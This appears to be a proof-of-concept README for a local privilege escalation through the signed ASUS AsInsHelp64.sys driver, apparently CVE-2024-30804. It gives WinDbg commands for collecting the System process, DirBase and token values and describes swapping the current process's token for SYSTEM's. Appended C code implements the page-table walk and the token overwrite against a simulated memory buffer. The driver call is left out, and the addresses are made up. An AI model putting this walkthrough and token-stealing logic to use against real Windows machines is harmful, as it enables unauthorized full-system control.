This is a PoC for Local Privilege Escalation (LPE) that exploits the AsInsHelp64.sys driver.
It abuses a legitimate, signed ASUS driver to map physical memory from user mode and overwrite the current process's kernel token with the System token, gaining NT AUTHORITY\SYSTEM privileges.
- Target: AsInsHelp64.sys (related to ASUS Fan Xpert < v.10013)
- Technique: Arbitrary Physical Memory Read/Write
- Root Cause: The driver exposes an IOCTL that lets any user map arbitrary physical memory into their own virtual address space. Because the driver performs no permission check on the caller, an unprivileged process can read and modify critical kernel structures (such as `_EPROCESS`) directly through that mapping.
- OS: Windows 10 (2004) through Windows 11 (23H2), x64
- Driver: AsInsHelp64.sys must be loaded.
- Tools: WinDbg (required for stability: the PoC takes the kernel addresses it needs from the debugger instead of scanning memory for them).
- Run the Exploit:
  - Run the compiled PoC. The program will ask for the System process information gathered in the next steps.
  - Get the System EPROCESS and DirBase (CR3) from WinDbg. Instead of risking a crash by scanning memory, retrieve the exact values manually:
    `!process 0 0 System`
    Copy the address following `PROCESS` (the System `_EPROCESS`) and the value of `DirBase` (the System CR3, which is needed to translate the `_EPROCESS` virtual addresses into the physical addresses the driver maps).
  - Get the System token. Use the `_EPROCESS` address found in the previous step to read the Token value:
    `dq <System_EPROCESS_Address>+4b8 L1`
    `0x4b8` is the `_EPROCESS.Token` offset on the supported builds; if you are on a different build, confirm it with `dt nt!_EPROCESS Token` before using it. The value is an `_EX_FAST_REF`, so its low four bits are a cached reference count rather than part of the `_TOKEN` pointer.
  - Input & Pwn: enter the values into the tool. It will locate your process in the kernel, overwrite its token with the System token, and spawn a new CMD. Verify in that CMD with:
    `whoami`
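The two things the WinDbg values feed into, as an added example that is not part of this PoC or of the ASUS driver: a 4-level x64 page walk rooted at the System `DirBase` that turns the `_EPROCESS` virtual addresses into physical addresses, and the write of the System `_EX_FAST_REF` over the target process's `Token` field at `+0x4b8`. The driver's IOCTL is not reproduced; "physical memory" here is a constructed in-memory buffer behind `phys_read64`/`phys_write64`, and the `FIX_*` addresses and token values are made up so the walk has something to translate. On a real target those two functions would go through the driver's mapping instead.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the driver's physical-memory mapping: a flat 2 MiB
 * buffer indexed by physical address. On the real target these two functions
 * would read/write through the view returned by the driver's IOCTL, which is
 * deliberately not reproduced here. */
#define PHYS_SIZE (1u << 21)
static uint8_t g_phys[PHYS_SIZE];

static bool phys_read64(uint64_t pa, uint64_t *out) {
    if (pa + 8 > PHYS_SIZE) return false;
    memcpy(out, &g_phys[pa], 8);
    return true;
}

static bool phys_write64(uint64_t pa, uint64_t val) {
    if (pa + 8 > PHYS_SIZE) return false;
    memcpy(&g_phys[pa], &val, 8);
    return true;
}

/* x64 4-level page walk rooted at DirBase (CR3): PML4 -> PDPT -> PD -> PT.
 * Large pages (PS bit set at the PDPT or PD level) are handled. A non-present
 * entry makes the walk fail instead of reading through garbage. */
#define PTE_PRESENT 1ull
#define PTE_RW      2ull
#define PTE_PS      (1ull << 7)
#define PFN_MASK    0x000FFFFFFFFFF000ull
static const int k_shift[4] = {39, 30, 21, 12};

static bool va_to_pa(uint64_t dirbase, uint64_t va, uint64_t *pa) {
    uint64_t table = dirbase & PFN_MASK;
    for (int level = 0; level < 4; level++) {
        uint64_t entry;
        if (!phys_read64(table + ((va >> k_shift[level]) & 0x1FF) * 8, &entry)) return false;
        if (!(entry & PTE_PRESENT)) return false;
        if ((level == 1 || level == 2) && (entry & PTE_PS)) {   /* 1 GiB / 2 MiB page */
            uint64_t off = (1ull << k_shift[level]) - 1;
            *pa = (entry & PFN_MASK & ~off) | (va & off);
            return true;
        }
        table = entry & PFN_MASK;
    }
    *pa = table | (va & 0xFFF);
    return true;
}

/* _EPROCESS.Token offset for Windows 10 2004 through Windows 11 23H2 (the range
 * the PoC lists). The field is an _EX_FAST_REF: bits 0-3 are a cached reference
 * count, bits 4-63 the _TOKEN pointer, which is why values read with `dq`
 * rarely end in 0. */
#define TOKEN_OFFSET 0x4b8ull

static bool read_token(uint64_t dirbase, uint64_t eprocess, uint64_t *token) {
    uint64_t pa;
    return va_to_pa(dirbase, eprocess + TOKEN_OFFSET, &pa) && phys_read64(pa, token);
}

/* Copy the System token's _EX_FAST_REF over the target's Token field. */
static bool steal_token(uint64_t dirbase, uint64_t system_eproc, uint64_t target_eproc) {
    uint64_t sys_tok, tgt_pa;
    if (!read_token(dirbase, system_eproc, &sys_tok)) return false;
    if (!va_to_pa(dirbase, target_eproc + TOKEN_OFFSET, &tgt_pa)) return false;
    return phys_write64(tgt_pa, sys_tok);
}

/* ---- Constructed fixture: builds page tables inside g_phys so the walk above
 * has something to translate. All addresses and token values are made up. ---- */
static uint64_t g_next_table = 0x2000;   /* bump allocator for page-table pages */

static void map_4k(uint64_t dirbase, uint64_t va, uint64_t pa) {
    uint64_t table = dirbase;
    for (int level = 0; level < 3; level++) {
        uint64_t slot = table + ((va >> k_shift[level]) & 0x1FF) * 8, entry;
        phys_read64(slot, &entry);
        if (!(entry & PTE_PRESENT)) {          /* allocate the next-level table */
            entry = g_next_table | PTE_PRESENT | PTE_RW;
            g_next_table += 0x1000;
            phys_write64(slot, entry);
        }
        table = entry & PFN_MASK;
    }
    phys_write64(table + ((va >> 12) & 0x1FF) * 8, (pa & PFN_MASK) | PTE_PRESENT | PTE_RW);
}

#define FIX_DIRBASE   0x1000ull               /* fake DirBase from !process */
#define FIX_SYS_EPROC 0xFFFFA08012345040ull   /* fake System _EPROCESS VA */
#define FIX_TGT_EPROC 0xFFFFA08012346080ull   /* fake target _EPROCESS VA */
#define FIX_SYS_TOKEN 0xFFFF9A8B2C3D4E67ull   /* fake System token (refcount 7) */

static void build_fixture(void) {
    memset(g_phys, 0, sizeof g_phys);
    g_next_table = 0x2000;
    map_4k(FIX_DIRBASE, FIX_SYS_EPROC & ~0xFFFull, 0x10000);
    map_4k(FIX_DIRBASE, FIX_TGT_EPROC & ~0xFFFull, 0x11000);
    uint64_t pa;
    va_to_pa(FIX_DIRBASE, FIX_SYS_EPROC + TOKEN_OFFSET, &pa);
    phys_write64(pa, FIX_SYS_TOKEN);
    va_to_pa(FIX_DIRBASE, FIX_TGT_EPROC + TOKEN_OFFSET, &pa);
    phys_write64(pa, 0xFFFF9A8B11112223ull);   /* fake low-privilege token */
}

int main(void) {
    build_fixture();
    uint64_t before = 0, after = 0;
    read_token(FIX_DIRBASE, FIX_TGT_EPROC, &before);
    bool ok = steal_token(FIX_DIRBASE, FIX_SYS_EPROC, FIX_TGT_EPROC);
    read_token(FIX_DIRBASE, FIX_TGT_EPROC, &after);
    printf("swap %s: target token 0x%llx -> 0x%llx\n", ok ? "ok" : "failed",
           (unsigned long long)before, (unsigned long long)after);
    return ok ? 0 : 1;
}
```

The walk reads every level through the same read primitive, so on a real target a wrong `DirBase` or a stale `_EPROCESS` address fails at the first non-present entry rather than writing the token into an unrelated physical page, which is the crash the README's WinDbg step is meant to avoid.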
https://github.com/DriverHunter/Win-Driver-EXP/tree/main/CVE-2024-30804